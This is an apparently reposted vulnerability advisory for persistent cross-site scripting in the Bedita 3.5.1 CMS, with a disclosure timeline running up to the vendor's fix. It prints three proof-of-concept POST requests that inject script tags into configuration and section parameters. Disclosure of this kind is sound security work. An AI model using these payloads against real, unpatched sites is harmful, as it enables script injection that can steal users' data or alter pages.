Vulners
Lucene search
Bedita 3.5.1 - XSS Vulnerabilities
########################################################################################
# Title: Bedita 3.5.1 XSS vulnerabilites
# Application: Bedita
# Version: 3.5.1
# Software Link: http://www.bedita.com/
# Date: 2015-03-09
# Author: Sébastien Morin
# Contact: https://twitter.com/SebMorin1
# Category: Web Applications
########################################################################################
===================
Introduction:
===================
BEdita is an open source web development framework that features a Content Management System (CMS) out-of-the-box.
BEdita is built upon the PHP development framework CakePHP.
(http://en.wikipedia.org/wiki/BEdita)
########################################################################################
===================
Report Timeline:
===================
2015-03-09 Vulnerabilities reported to vendor
2015-03-10 Vendor reponse
2015-03-11 Vendor confirmed
2015-08-31 Vendor releases version 3.6
2015-08-31 Advisory Release
########################################################################################
===================
Technical details:
===================
Persistent XSS:
===============
Bedita 3.5.1 contains multiples flaws that allows a persistent remote cross site scripting attack in the "cfg[projectName]", "data[stats_provider_url]" and "data[description]" parameters.
This could allow malicious users to create a specially crafted POST request that would execute arbitrary
code in a user's browser in order to gather data from them or to modify the content of the page presented to the user.
Exploits Examples:
1)cfg[projectName] parameter:
POST http://127.0.0.1/bedita/index.php/admin/saveConfig
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/bedita/index.php/admin/viewConfig
Cookie: CAKEPHP=7jviahcvolu87hdp8dqbo25jl6
Connection: keep-alive
[...]cfg%5BprojectName%5D=<script>alert(12345)</script>[...]
2) data[stats_provider_url] parameter:
POST http://127.0.0.1/bedita/index.php/areas/saveArea
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/bedita/index.php/areas/saveArea
Cookie: CAKEPHP=7jviahcvolu87hdp8dqbo25jl6
Connection: keep-alive
[...]data%5Bstats_provider_url%5D="><script>alert(12345)</script>[...]
3) data[description] parameter:
POST http://127.0.0.1/bedita/index.php/areas/saveSection
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/bedita/index.php/areas/saveSection
Cookie: CAKEPHP=7jviahcvolu87hdp8dqbo25jl6
Connection: keep-alive
[...]data%5Bdescription%5D=</textarea><script>alert(123)</script>[...]
########################################################################################
# 0day.today [2018-03-10] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Sep 2015 00:00Current
7.1High risk
Vulners AI Score7.1